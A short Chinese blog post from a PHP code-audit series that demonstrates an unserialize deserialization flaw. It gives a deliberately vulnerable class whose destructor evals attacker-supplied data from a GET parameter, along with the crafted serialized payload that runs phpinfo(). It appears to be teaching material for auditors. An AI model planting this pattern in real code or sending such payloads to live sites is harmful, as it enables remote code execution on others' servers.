您当前的位置: 首页 > 学无止境 > 网站建设 网站首页网站建设
php代码审计-unserialize反序列化执行漏洞
发布时间:2016-12-18 15:24:12编辑:雪饮阅读()
<?php
class demo{
var $test="moonsec";
function __destruct(){
eval($this->test);
}
}
unserialize($_GET['code']);
/*
class demo{
var $test="phpinfo();";
}
$class=new demo();
print_r(serialize($class));
访问该区块代码将获得序列化对象字符串:
O:4:"demo":1:{s:4:"test";s:10:"phpinfo();";}
将该字符串传递到code参数中即可使得第一个demo类的test变量变成该序列化对象的字符串,
unserialize使得该字符串重新变成一个从类到示例化的过程。
而由于eval函数的特性,从而使得unserialize后的对象的test变量(字符串)中“phpinfo()”函数被执行。
*/
?>
关键字词:php代码审计
上一篇:php代码审计-sql注入
下一篇:php代码审计-xss存储漏洞